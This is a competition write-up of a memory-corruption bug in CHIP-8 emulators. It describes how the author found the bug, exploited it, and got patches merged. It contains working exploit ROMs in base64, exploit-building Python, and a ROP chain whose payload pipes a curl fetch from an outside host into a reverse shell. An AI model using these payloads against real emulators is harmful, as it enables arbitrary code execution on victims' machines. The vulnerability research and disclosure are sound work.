Retr0id's journey to a 20-byte emulator escape. 2022-07-30 Late one night, I read the Binary Golf Grand Prix 3 announcement, and was immediately itching to get started. In summary, the challenge is to create the shortest input file that crashes a program of your choice. Bonus points are awarded for: ○ +1024 pts, if you submit a writeup about your process and details about the crash ○ +1024 pts, if the program counter is all 3's when the program crashes ○ +2048 pts, if you hijack execution and print or return "3" ○ +4096 pts, if you author a patch for your bug which is merged before the end of the competition If you're reading this, then I already have 1024 points in the bag! Being the ultra-competitive person that I am, I wanted to maximise my score. To do that, I needed a strategy: I asked myself "What would a winning BGGP3 entry look like?", and worked backwards from there. To state the obvious, it needs to collect all the bonus points. To maximise PR-mergeability, I thought my best bet would be to find a novel vulnerability, in an actively-maintained project. An actively-maintained project generally implies that we'll be dealing with modern exploit mitigations (e.g. ASLR), which we'll need to bypass in order to hijack execution. In the world of modern mitigations, exploits usually require a degree of interactivity, whether it's over a network connection, or within some scripting environment. For example, to leak pointers and calculate offsets. Since our input needs to be a static file, network interactivity isn't an option, so we need something scriptable. We could draw inspiration from the NSO Group, which used some clever tricks to perform computations within a PDF file, as part of an exploit. However, if we pick something that's scriptable by design, we don't need to be quite so clever (or well-funded!) I was inspired by one of the prompts in the BGGP3 announcement: > What's the smallest ROM that crashes your favorite emulator? This got me thinking about CHIP-8 emulators. CHIP-8 ticks all the boxes, from a point-scoring perspective: ○ It has a headerless ROM file format, ideal for code golfing. ○ It's a turing-complete environment, ideal for mitigation bypasses. ○ There are hundreds of CHIP-8 emulators out there, so I'm almost guaranteed to find an exploitable bug and get a patch merged, eventually. But, I can't review 100 codebases, or even set up 100 fuzz harnesses! Just when I was ready to give up, I remembered this: ╒══════════════════════════════════════════╕ │ Fuzzing experts HATE him! │ │ │ │ One Weird Trick to discover security │ │ bugs without reading or running ANY code │ │ │ │ >>> CLICK HERE <<< │ ╘══════════════════════════════════════════╛ I clicked the link, and was not let down. Turns out, the real trick is to read a specification, and ask yourself: > If I implemented this spec, what mistakes might I make? Fortunately for me, this question isn't even a hypothetical - I've written multiple CHIP-8 emulators myself, over the years. I only had to skim the spec to refresh my memory, and already I had an idea for a bug (I'll tell you what it is later!). The next step was to go out and look for instances of this currently-hypothetical bug. I googled "chip8 emulator source" and clicked the first result: I checked the relevant bits of the source and... it was vulnerable to the exact bug that I'd predicted! At this point I got very excited, and started writing a series of exploits. I even did a writeup. However, this was a big mistake - the developer has been inactive for the last couple of years, and the repo for even longer. I made a PR, but the chances of it getting merged were looking slim. At this point, I did what I should have done from the beginning - I searched through GitHub for CHIP-8 emulators written in C or C++ (memory unsafety FTW!) and reviewed about 10 of them. To my horror, the majority of repos I looked at had the same bug. I sorted through them based on a few criteria: ○ Is the bug easy to exploit, in practice? (This will make more sense once I explain the bug) ○ Is the developer/repo recently active? ○ Are there official builds/releases? (This will make my results more easily reproducible by the BGGP judges) After all that, I settled on this CHIP-8 emulator: It has 50 stars on GitHub. It's written in C, with an SDL2 frontend. It has official binary releases, and even its own website. I targeted the latest release (0.2.0) on amd64 (There's also an i386 build, which I would have considered if I thought it resulted in a smaller exploit). As a bonus, it's a fairly clean and well-documented codebase. Not only that, but there's a whole series of videos explaining how it was made (in Spanish, which unfortunately I cannot speak). If you do speak Spanish, perhaps the introductory video explaining how CHIP-8 works would be worth a watch. Up to this point, I've been mysterious about what the bug actually is. That's because I want to give you, the reader, the opportunity to discover it for yourself. I'll start with a brief overview of CHIP-8. CHIP-8 is a register-based virtual machine. It has 4096 bytes of RAM, and 16 8-bit registers (V0-VF). It also has a special I register which is used as an index into memory, mostly for sprite rendering, but also for lookup tables etc. Our target emulator chooses to store all CHIP-8 state in a struct called machine_t, declared in cpu.h. I invite you to read the code comments in cpu.h - Firstly because they explain the basics of CHIP-8, but they also do a surprisingly good job of explaining the bug. Can you guess what the bug might entail? Here's a big hint: ADDRESS_MASK is never actually used, in the rest of the codebase. Now let's look at why that matters. There are a few key CHIP-8 instructions to focus on: Annn - LD I, addr Fx1E - ADD I, Vx Fx55 - LD [I], Vx Fx65 - LD Vx, [I] (reference) The "LD I, addr" instruction sets I to be an arbitrary 12-bit value. The "ADD I, Vx" instruction adds the value of a register to I. It's implemented like this: ••• case 0x1E: /* FX1E: ADD - Add V[X] to I. */ cpu->i += cpu->v[OPCODE_X(opcode)]; break; ••• I is supposed to be a 12-bit value, but it's stored in a uint16_t. There are no bounds checks or bitmasks here, so you could keep adding to I until the result becomes larger than 12-bits! This is entirely harmless on its own, but how is the value of I used elsewhere? The "LD [I], Vx" and "LD Vx, [I]" instructions are important because you can use them to read and write memory, indexed by I. They're implemented like this: ••• case 0x55: /* FX55: LD - Save registers V[0] to V[x] starting at I */ for (int reg = 0; reg <= OPCODE_X(opcode); reg++) { cpu->mem[cpu->i + reg] = cpu->v[reg]; } break; case 0x65: /* FX65: LD - Load registers V[0] to V[x] from I. */ for (int reg = 0; reg <= OPCODE_X(opcode); reg++) { cpu->v[reg] = cpu->mem[cpu->i + reg]; } break; ••• Well, there's no bounds checking or masking going on there either... which gives us a very powerful exploit primitive! We can use this to write and read out-of-bounds of the mem array - by up to 60KB! As I mentioned earlier, this same bug was very common across all the emulators I looked at. There's no "official" CHIP-8 specification, but none that I'm aware of describe how to handle the case where I overflows, so most programmers simply overlook it. I was curious, and wanted to find out how it was handled on the original CHIP-8 interpreter for the COSMAC VIP (A microcomputer from 1977). Thanks to this great writeup, I was able to find an answer: > One thing to note about this instruction (ADD I, Vx) is that > it will quite happily let you sail off into the uncharted > waters of memory beyond the on-board 4K, because it will only > wrap when the offset takes the address beyond 65535. The > Chip-8 programmer must ensure it contains a meaningful value. Soooo, the answer is that it doesn't handle it - the original CHIP-8 interpreter has the same bug! Given the historical context, I wouldn't call it a bug exactly. The same interpreter also has an instruction to execute a native-code subroutine written in RCA 1802 machine code, which is described here (most modern emulators don't support it). So on the COSMAC VIP, running a CHIP-8 program was equivalent to running a native-code program, in terms of security expectations (sandboxing wasn't really a consideration back then). However, a lot has changed in the last 45 years of computing. When you load up a ROM in an emulator in 2022, you don't expect it to execute arbitrary native code on your system - which is why I'm quite confident in framing it as a vulnerability in this context. I decided that the simplest way to fix the bug was to mask I with ADDRESS_MASK (0xFFF), every time it's used to index memory. This effectively implements wraparound within the 4KB address space. From reading the code comments, I think this was the original intention of the developer - they just forgot. So I made a GitHub PR, and it was merged 10 minutes later! Our vulnerability lets us read and write past the end of the mem array. But what's beyond the end? If we look back to the definition of the machine_t struct, two fields stand out: ••• /** * Main data structure for holding information and state about * processor, Memory, stack, and register set is all defined * here. */ struct machine_t { byte mem[MEMSIZ]; // Memory is allocated as a buffer address pc; // Program Counter address stack[16]; // Stack can hold 16 16-bit values char sp; // Stack Pointer: points to next free cell byte v[16]; // 16 general purpose registers address i; // Special I register byte dt, st; // Timers char screen[8192]; // Screen bitmap char wait_key; // Key the CHIP-8 is idle waiting for. keyboard_poller_t keydown; // Keyboard poller speaker_handler_t speaker; // Speaker handler int exit; // Should close the game. int esm; // Is in Extended Screen Mode? byte r[8]; // R register set. }; ••• keydown and speaker are both function pointers - they get called every time the emulator wants to check for keyboard input, or make sound. If we overwrite either of those pointers, then we can hijack the flow of execution! We could overwrite them with 0x333333333333 to get the +1024 bonus points, or aim directly for the "print or return 3" objective for +2048 points. I chose the latter, and I found a surprisingly simple way to do it. The keydown handler is called with one argument - the index of the key to check, from 0 to 0xF. If we overwrite the handler with the address of libc function exit(), and then ask the emulator to check key 3, it'll end up executing exit(3). This makes the program exit with a return code of 3, fulfilling the objective. However, libc is subject to ASLR, so we can't know the address of exit() ahead of time. We'd have to leak a pointer and calculate an offset - which is very possible, but it would waste precious bytes, losing us points. Fortunately, the release binary is compiled with PIE disabled, which means that the address of any code within the main executable is not randomised, and known ahead of time. Since the main binary needs to call exit() under normal conditions (to exit the program), it's included in the Procedure Linkage Table. Rather than trying to directly call exit() at an unknown address, we can call into the PLT at a known pre-calculated address. This keeps our exploit small and simple, so we can get maximum points! I wrote a python script, using pwntools to resolve the address of exit@plt, and some ad-hoc helper functions to assist with assembling CHIP-8 machine code. You can read the full script here, but this is the important part: ••• program = [ # we want to set I to 0x3040 # 0x3040 = 193 * 64 set_reg(0xc, 193), "add_i_loop", add_i(0xc), # I += Vc add_reg_byte(0xe, 1), # Ve += 1 skip_if_reg_equals_byte(0xe, 64), jump("add_i_loop"), set_reg(0, elf.plt.exit & 0xff), set_reg(1, (elf.plt.exit >> 8) & 0xff), store_regs_at_i(1), # partial overwrite function pointer set_reg(3, 3), 0xE39E, # "skip next if key 3 is pressed" ] ••• The first half of the exploit is just a loop that sets I to 0x3040. 0x3040 is the offset of the keydown field within the machine_t struct. I came up with this specific loop by factorising 0x3040 into 193 * 64 - the loop adds 193 to I, 64 times. I overwrite the first two bytes of the function pointer, with the address of exit@plt. I only need to overwrite the first two bytes, because the rest of the bytes happen to be the correct value already - this saves us some space. When executed, the python script spits out a single 20-byte ROM file. Here it is in base64: bMH8Hn4BPkASAmBgYRDxVWMD454= Yup, that's the whole exploit! We can run the exploit like this: ┌──────────────────────────────────────────────────────────────┐ │ $ chip8 exploit.rom │ │ $ echo $? │ │ 3 │ └──────────────────────────────────────────────────────────────┘ We use the bash variable $? to read the return value of the program, confirming that our exploit was successful. I have to admit, this is slightly anti-climactic - but it does score us a lot of points. According to my calculations, it's: + (4096 - 20) # size + 1024 # writeup + 2048 # hijack execution and return 3 + 4096 # patching = 11244 # total I'm not sure if it'll win the competition, but I'm certainly happy with that result! As I mentioned before, the exploit was a bit anti-climactic. Even though I won't get any points for it, I really want to pop a shell. To do this, we're going to need a much more involved exploit, with a proper ASLR bypass. We're also going to need some ROP, to spawn a reverse shell. Using our function pointer overwrite, we essentially get to execute a single ROP gadget. Ideally, we want to use that single gadget to pivot to a longer ROP payload. I used ROPgadget to search through the gadgets present in the main binary, and found a good one: 0x0000000000401a55 : add rsp, 0x48 ; ret This adds 0x48 to the stack pointer, and then returns. Very fortunately, this ends up shifting the stack pointer to within the mem array (which is stored on the stack), which we fully control via CHIP-8 instructions. Specifically, rsp ends up pointing to CHIP-8 memory address 0x20. There aren't enough gadgets in the main binary to pop a shell, so we're going to need to ROP into libc, which is ASLR'ed. This means we need to leak an address. As I mentioned, the mem array is stored on the stack, so if we look far enough beyond it, we'll find the return address of main(). Since main() is originally called by libc, its return address points back to libc - specifically __libc_start_main+243 So, we can leak a libc pointer by reading from the stack, but we need to do some arithmetic on it to calculate the offsets of the gadgets in our ROP chain. CHIP-8 is only an 8-bit machine, but our addresses are 64-bit values. However, we can do full 64-bit additions and subtractions via multiple 8-bit operations (i.e. bigint arithmetic). I implemented that, along with the rest of the exploit, here. Ultimately, it calls system("reverse shell command here") - the address of the string is calculated by leaking a stack pointer off the stack, in the same style as the libc leak. When we run this more advanced exploit, we get something much more exciting: ┌──────────────────────────────────────────────────────────────┐ │ $ chip8 exploit.rom │ │ _ _ _ _ ____ ____ ____ ____ _____ _ │ │ | | | | ___| | | ___ | __ ) / ___|/ ___| _ \___ /| | │ │ | |_| |/ _ \ | |/ _ \ | _ \| | _| | _| |_) ||_ \| | │ │ | _ | __/ | | (_) | | |_) | |_| | |_| | __/___) |_| │ │ |_| |_|\___|_|_|\___( ) |____/ \____|\____|_| |____/(_) │ │ |/ │ │ │ │ Spawning reverse shell... │ │ │ └──────────────────────────────────────────────────────────────┘ Perfect for showing off in a screenshot on Twitter! This exploit is a whopping 326 bytes, but I didn't really size-optimise it at all. Here it is as base64, but you'll probably want to adjust the shell command before testing it: EnRmaWdsZXQgSGVsbG8sIEJHR1AzITsgZWNobzsgZWNobyBTcGF3bmluZyBy ZXZlcnNlIHNoZWxsLi4uOyBjdXJsIGh0dHBzOi8vcmV2ZXJzZS1zaGVsbC5z aC8xOTIuMTY4LjAuODA6MTMzNyB8IHNoAABgi2EVYkBjAGQAZQBmAGcAoCD3 VW3AbjAjGPdlaHKAhCMoaNCBhCMsaP+ChCMwaP+DhCM0aP+EhCM4aP+FhCM8 aP+GhCNAaP+HhKAo91Vt2G4wIxj3ZWgNgIQjKGjigYQjLGgCgoQjMGgAg4Qj NGgAhIQjOGgAhYQjPGgAhoQjQGgAh4SgMPdVbXhuMCMYYFVhGmJAYwBkAGUA ZgBnAPdVYP/wGKAAbP/8Ho7EPgATHP0eAO6O8IHkjvCC5I7wg+SO8ITkjvCF 5I7whuSO8IfkAO4= To summarise, I identified a hypothetical CHIP-8 emulator vulnerability by reading a specification, then found multiple instances of it in concrete implementations. Then, I wrote a 20-byte exploit, scoring 11244 points. Finally, I wrote a more complex remote shell exploit taking up 326 bytes, just for fun. Although fuzzing is often a quick way to find a crash, most of the time the crashes you get aren't very exploitable. I prefer discovering vulnerabilities manually, because it gives you more control over the kinds of bugs you're going to find - it's easier to look for a specific bug class, if you think it'll be helpful for your objective. Overall I submitted 3 different PRs to 3 different repos, all fixing the same bug. 2 out of 3 have been merged. There are still plenty more vulnerable repos out there! I had a lot of fun working on this project, and I hope you enjoyed reading about it too. At time of writing, there's still plenty of time left to enter BGGP3! - Retr0id